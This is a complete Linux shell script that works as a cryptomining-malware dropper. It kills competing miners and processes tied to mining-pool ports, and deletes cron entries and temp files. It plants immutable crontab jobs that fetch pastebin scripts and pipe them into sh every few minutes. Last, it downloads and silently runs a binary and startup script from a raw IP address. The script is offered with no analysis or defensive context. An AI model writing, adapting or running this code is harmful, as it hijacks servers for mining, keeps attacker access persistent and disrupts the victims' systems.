#!/bin/sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
killall -9 /tmp/.sysinfo/*
killall /tmp/*
killall /var/tmp/*
rm -f /tmp/.java
ps aux | grep -v grep | grep 'crun' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'javaupDate' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v 'grep\|root' | grep 'idle_inject/0' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v 'grep\|root' | grep 'card0-crtc0' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/webapps/' | awk '{print $2}' | xargs -I % kill -9 %
pkill SSHD2
s2=`whoami`
if [ s2 = "root" ];
then
    sed -i '/old.txt/d' /etc/crontab
    sed -i '/pastebin/d' /etc/hosts
    sed -i '/supportxmr/d' /etc/hosts
    chattr -isa /var/spool/cron/*
    rm -rf /var/spool/cron/*
    chattr +isa /tmp/xms
    rm -f /var/tmp/kinsing
    chattr -ia /etc/crontab
    echo '*/10 * * * * root curl -fsSL https://pastebin.com/raw/65y4EmZV | sh > /dev/null 2>&1' > /etc/crontab
    chattr +isa /etc/crontab
    chattr -ia /var/spool/cron/root
    chattr -ia /var/spool/cron/crontabs/root
    echo '*/10 * * * * curl -fsSL https://pastebin.com/raw/65y4EmZV | sh > /dev/null 2>&1' >/var/spool/cron/root
    echo '*/10 * * * * curl -fsSL https://pastebin.com/raw/65y4EmZV | sh > /dev/null 2>&1' >/var/spool/cron/crontabs/root
    echo '*/10 * * * * root curl -fsSL https://pastebin.com/raw/65y4EmZV | sh > /dev/null 2>&1' > /etc/cron.d/root
    chattr +ia /var/spool/cron/crontabs/root
    chattr +ia /var/spool/cron/root
    chattr +ia /var/spool/cron
    chattr +ia /etc/cron.d/root
    chattr +ia /etc/cron.d
else
    ps | grep -v grep | grep -v $s2 | grep -v 'java\|redis\|weblogic\|mongod\|mysql\|oracle\|grep\|postgres\|confluence\|awk\|sbin\|WebLogic.sh\|server\|aux\|httpd\|sh\|pts'| awk '{print $1}'| xargs -I % kill -9 %
    ps aux | grep -v 'java\|redis\|weblogic\|mongod\|mysql\|oracle\|grep\|postgres\|confluence\|awk\|sbin\|WebLogic.sh\|server\|aux\|httpd\|sh\|pts' | grep ${s2:0:7} | awk '{print $2}' | xargs -I % kill -9 %
    ps aux | grep -v 'java\|redis\|weblogic\|mongod\|mysql\|oracle\|grep\|postgres\|confluence\|awk\|sbin\|WebLogic.sh\|server\|aux\|httpd\|sh\|pts' | grep $s2 | awk '{print $2}' | xargs -I % kill -9 %
fi
if crontab -l | grep -q "H78T97AT"
then
    echo "Cron exists"
else
    crontab -r
    echo "Cron not found"
    echo "*/5 * * * * curl -fsSL https://pastebin.com/raw/pQ6agnhr | sh" | crontab -
fi
pgrep JavaUpdate | xargs -I % kill -9 %
pgrep kinsing | xargs -I % kill -9 %
pgrep donate | xargs -I % kill -9 %
pgrep Linux.TF | xargs -I % kill -9 %
pgrep sysupdate | xargs -I % kill -9 %
pgrep mysqlserver | xargs -I % kill -9 %
pgrep network01 | xargs -I % kill -9 %
pgrep xmrig | xargs -I % kill -9 %
pgrep javasd | xargs -I % kill -9 %
killall /tmp/.font-java/*
crontab -l | sed '/mysqlserver/d' | crontab -
crontab -l | sed '/ldr.sh/d' | crontab -
pkill -f /tmp/just4root
pkill -f /tmp/just4copy
pkill -f /tmp/.font-config
pkill -f /var/tmp/kinsing
rm -rf /var/tmp/.system-python3.8-Updates
rm -rf /var/tmp/.Javadoc
pkill watchhound
pkill gnd1481
killall /tmp/.font-java/*
netstat -antp | grep '94.130.164.163:443'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':13531'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':5555'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':7777'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':5731'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':13333'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':14433'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':14444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
ps -ef | grep /tmp/ | grep -v 'java\|redis\|mongod\|grep\|weblogic\|oracle'| cut -c 9-15 | xargs kill -9
ps -ef | grep /webapps/ | grep -v 'java\|redis\|mongod\|grep\|weblogic\|oracle'| cut -c 9-15 | xargs kill -9
pkill cloudupdate
pkill diskmanagerd
pkill jspserv
pkill xmrig
pkill sysupdate
pkill Linux.TF
pkill network001
pkill network01
pkill network02
pkill wdnmd
pkill siin
pkill Linux.TF
pkill javafd
pkill sysguard
pkill networkservice
pkill kdevtmpfs
pkill watchbog
killall -9 kworkerds
rm -f /tmp/*
p=$(ps auxf|grep javae|awk '{if($3>=70.0) print $2}')
name=""$p
if [ -z "$name" ]
then
    pkill -f startup.sh
    ps auxf| grep -v 'systemd\|grep\|java' | awk '{if($3>=70.0) print $2}'| xargs -I % kill -9 %
    netstat -antp | grep ':3333'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
    mkdir /tmp/.XIN-unix
    curl -fsSL http://222.108.161.27:7070/docs/config.json -o /tmp/.XIN-unix/config.json
    curl -fsSL http://222.108.161.27:7070/docs/s.rar -o /tmp/.XIN-unix/javae
    curl -fsSL http://222.108.161.27:7070/docs/startup.sh -o /tmp/startup.sh
    chmod +x /tmp/.XIN-unix/javae
    chmod +x /tmp/startup.sh
    cd /tmp
    nohup bash startup.sh >/dev/null 2>&1 &
    sleep 10
    rm -f /tmp/startup.sh
else
    exit
fi